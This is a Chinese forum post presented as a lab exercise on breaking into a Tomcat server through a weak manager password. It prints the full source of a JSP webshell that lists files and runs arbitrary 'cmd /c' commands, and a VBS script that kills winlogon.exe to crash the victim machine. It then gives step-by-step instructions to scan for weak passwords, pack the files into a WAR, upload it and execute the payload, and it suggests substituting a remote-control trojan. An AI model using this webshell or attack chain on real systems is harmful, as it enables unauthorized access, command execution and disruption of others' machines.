设为首页收藏本站
切换到宽版

电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

电脑疯子技术论坛|电脑极客社区»技术论坛 电脑疯子|资源分享 电脑教程分享 Tomcat服务器弱口令漏洞攻击实验
返回列表 发新帖

[WEB前端技术] Tomcat服务器弱口令漏洞攻击实验

[复制链接]
zhaorong 发表于 2021-4-29 16:05:24 | 显示全部楼层 |阅读模式
本帖最后由 zhaorong 于 2021-4-29 16:06 编辑

说在前面

早期Tomcat服务器上的管理员后台的密码都过于简单如 admin 123456 如此很容易被攻击
者利用 并上传木马到服务器上面 从而感染服务器主机。

实验内容

1、在XP系统上搭建Tomcat服务器平台;
2、在另一台虚拟机上利用弱口令漏洞上传木马程序 使得XP系统中木马。

实验步骤

一、搭建Tomcat服务器平台

1.安装JAVAJDK

环境变量的配置:(这里我的JAVA是按照默认安装地址安装的)
JAVA_HOME:C:\Program Files\Java\jdk1.7.0_79
Path:%JAVA_HOME%\bin
CLASSPATH:.%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tool.jar

Cmd输入命令查看

输入:java –version 检查是否安装成功。

210749hadn9yi8edyko3vb.png

输入:javac 检查环境变量配置是否成功。

99.png

2.安装Apache-Tomcat服务器

将压缩包解压,把整个文件夹拷贝至C盘。(免安装)
添加环境变量:
TOMCAT_HOME:C:\apache-tomcat-6.0.37
进入bin目录 点击startup.bat或者shutdown.bat可以启动或关闭服务器。

若测试不成功 则需添加完整的环境变量。(可选不是必选)

210831yszxrsqs2r6x8s1n.png

点击startup.exe 启动服务器 在浏览器中输入:http://127.0.0.1:8080/若显示
如下界面则服务器启动成功。

210832g62gg1zz6jgjtl2g.png

二、登录管理员后台

登录管理员后台需要用户名密码 刚开始未设置 我们要自行设置。

210833b9vsk77y35jk7ynz.png.thumb.jpg

首先查看存放用户名密码的文件:在conf文件夹下的tomcat-users.xml,用记事本打开。将管理员账号添加进去:
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<role rolename="manager-jmx"/>
<role rolename="manager-status"/>
<user username="admin" password="admin" roles="manager-gui,manager
-script,manager-jmx,manager-status"/>

其中各个rolename的含义:

100.jpg

点击保存后重启服务器 回到登录界面 输入用户名密码 即可进入管理员界面:

98.jpg

三、木马制作

Tomcat只支持war的后缀文件包的上传,因此,必须将jsp木马程序与其他木马一起打包成war包才能上传。
在安装有JDK的操作系统上,将所需要上传的木马放在同一个文件夹中,存放到C盘。
这里用到一个s.jsp的木马程序以及V.vbs病毒程序。

这里s.jsp的代码:
  1. <%@ page contentType="text/html;charset=gb2312"%>
  2. <%[url=home.php?mod=space&uid=157936]@Page[/url] import="java.io.*" %>
  3. <%@page import="java.util.*"%>
  4. <style>
  5. td,select,input,body
  6. {
  7. font-size:9pt;
  8. }
  9. A { TEXT-DECORATION: none }
  10. </style>
  11. <title>Jsp File Manger Version0.5 --bY 慈勤强 [email]cqq1978@Gmail.com[/email]</title>
  12. <%!
  13. String getDrivers()
  14. /**
  15. Windows系统上取得可用的所有逻辑盘
  16. **/
  17. {
  18. StringBuffer sb=new StringBuffer("驱动器 : ");
  19. File roots[]=File.listRoots();
  20. for(int i=0;i<roots.length;i++)
  21. {
  22. sb.append("<a href='?path="+roots[i]+"'>");
  23. sb.append(roots[i]+"</a>   ");
  24. }
  25. return sb.toString();
  26. }
  27. %>
  28. <%
  29. String strThisFile="folder.jsp";
  30. request.setCharacterEncoding("gb2312");
  31. String strDir = request.getParameter("path");
  32. if(strDir==null||strDir.length()<1)
  33. {
  34. strDir = "c:\";
  35. }
  36. StringBuffer sb=new StringBuffer("");
  37. StringBuffer sbFile=new StringBuffer("");
  38. try
  39. {
  40. out.println("<table border=1 width='100%' bgcolor='#F1f1f1'><tr><td width='30%'>当前目录:
  41. <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
  42. File objFile = new File(strDir);
  43. File list[] = objFile.listFiles();
  44. if(objFile.getAbsolutePath().length()>3)
  45. {
  46. sb.append("<tr><td > </td><td><a href='?path="+objFile.g
  47. etParentFile().getAbsolutePath()+"'>");
  48. sb.append("上级目录</a><br>- - - - - - - - - - - </td></tr>\r\n");
  49. }
  50. for(int i=0;i<list.length;i++)
  51. {
  52. if(list[i].isDirectory())
  53. {
  54. sb.append("<tr><td > </td><td>");
  55. sb.append("<a href='?path="+list[i].getAbsolutePath()+"'>"+list[i].getName()+"</a>");
  56. sb.append("</td></tr>");
  57. //sb.append("</td></tr></table>\r\n");
  58. }
  59. else
  60. {
  61. String strLen="";
  62. String strDT="";
  63. long lFile=0;
  64. lFile=list[i].length();

  66. if(lFile>1000000)
  67. {
  68. lFile=lFile/1000000;
  69. strLen="" + lFile + " M";
  70. }
  71. else if(lFile>1000)
  72. {
  73. lFile=lFile/1000;
  74. strLen="" + lFile + " K";
  75. }
  76. else
  77. {
  78. strLen="" + lFile + " Byte";
  79. }
  80. Date dt=new Date(list[i].lastModified());
  81. strDT=dt.toLocaleString();
  82. sbFile.append("<tr><td>");
  83. sbFile.append(""+list[i].getName());
  84. sbFile.append("</td><td>");
  85. sbFile.append(""+strLen);
  86. sbFile.append("</td><td>");
  87. sbFile.append(""+strDT);
  88. sbFile.append("</td><td>");
  89. sbFile.append("<!--修改 删除 下载 复制--> ");
  90. sbFile.append("</td></tr>\r\n");
  91. //sbFile.append("</td></tr></table>");
  92. }
  93. }
  94. //out.println(sb.toString()+sbFile.toString());
  95. }
  96. catch(Exception e)
  97. {
  98. out.println("<font color=red>操作失败: "+e.toString()+"</font>");
  99. }
  100. %>
  101. <table width="100%" border="1" cellspacing="0" cellpadding="5" border
  102. colorlight="#000000" bordercolordark="#FFFFFF">
  103. <tr>
  104. <td width="25%" align="center" valign="top">
  105. <table width="98%" border="0" cellspacing="0" cellpadding="3">
  106. <%=sb%>
  107. </tr>
  108. </table>
  109. </td>
  110. <td width="81%" align="center" valign="top">
  111. <table width="98%" border="1" cellspacing="1" cellpadding="4" bordercol
  112. orlight="#cccccc" bordercolordark="#FFFFFF">
  113. <tr bgcolor="#E7e7e6">
  114. <td width="26%">文件名称</td>
  115. <td width="19%" align="center">文件大小</td>
  116. <td width="29%" align="center">修改时间</td>
  117. <td width="26%" align="center">文件操作</td>
  118. </tr>
  119. <%=sbFile%>
  120. <!-- <tr align="center">
  121. <td colspan="4"><br>
  122. 总计文件个数:<font color="#FF0000">30</font>
  123. 大小:<font color="#FF0000">664.9</font>
  124. KB </td>
  125. </tr>
  126. -->
  127. </table>
  128. </td>
  129. </tr>
  130. </table>
  131. <%
  132. String strCmd="";
  133. String line="";
  134. StringBuffer sbCmd=new StringBuffer("");
  135. strCmd = request.getParameter("cmd");
  136. if(strCmd!=null)
  137. {
  138. try
  139. {
  140. //out.println(strCmd);
  141. Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
  142. BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
  143. while((line=br.readLine())!=null)
  144. {
  145. sbCmd.append(line+"\r\n");
  146. }
  147. }
  148. catch(Exception e)
  149. {
  150. System.out.println(e.toString());
  151. }
  152. }
  153. %>
  154. <form name="cmd" action="" method="post">
  155. <input type="text" name="cmd" value="<%=strCmd%>" size=50>
  156. <input type=submit name=submit value="执行">
  157. </form>
  158. <%
  159. if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
  160. {
  161. %>
  162. <TEXTAREA NAME="cqq" ROWS="20" COLS="100%">
  163. <%=sbCmd.toString()%></TEXTAREA>
  164. <%
  165. }
  166. %>
复制代码

这里V.vbs的代码:
  1. if MsgBox("你是在上网络信息安全的课吗?",vbYesNo,"提示")=vbyes then
  2. msgbox "你真是在上网络安全课啊,这么好丫!"
  3. else
  4. msgbox "还不承认? 作为惩罚,折腾你一下",64,"严重警告!!!!!!"
  5. Set ws = CreateObject("Wscript.Shell")
  6. wscript.sleep 1200
  7. ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhide
  8. end if
复制代码

运行cmd 使用cd命令将目录切换到刚刚存放的c文件夹下:

68.png

使用命令将木马程序打包:
jar cvf shell.war *
若提示jar不是内部命令 请回到JDK安装步骤查看环境变量是否配置正确。
成功时的命令提示如下:

67.jpg

四、漏洞入侵

访问目标网站

使用另一台电脑输入以下网址:
http://192.168.41.131:8080/(对应IP地址要改)
访问成功将出现以下界面:

210835af9p8z8gqr8uukoc.png.thumb.jpg

弱口令扫描

打开Apache Tomcat crack软件,界面如下:

66.jpg

设置扫描网段 点击add按钮添加;点击start按钮开始扫描。扫描成功将获得口令和密码。

63.png

上传木马

利用前面扫描到的口令密码登录管理员网页 将之前做好的war包上传至服务器:

63.jpg

查看木马

在地址栏中输入网址:
http://192.168.41.131:8080/shell/s.jsp
即可看到对方电脑中所有的文件目录:

62.jpg

运行木马

找出之前一并上传的木马文件V.vbs 利用下面的执行功能让其在被害者电脑上运行:
c:\apache-tomcat-6.0.37\webapps\shell\V.vbs -install

61.jpg

此时在被攻击者电脑上会自运行病毒程序 即中病毒了。也可将病毒用灰鸽子木马替换实现远程控制。

210838g7c1qb7xym397em7.png.thumb.jpg

60.jpg

点击“否”的话要小心哦 因为电脑会变成 蓝屏不过不用怕其实就蓝屏一会儿就帮你重启
啦~不相信可以返回去看V.vbs的代码哦~
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-2-2 21:13

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表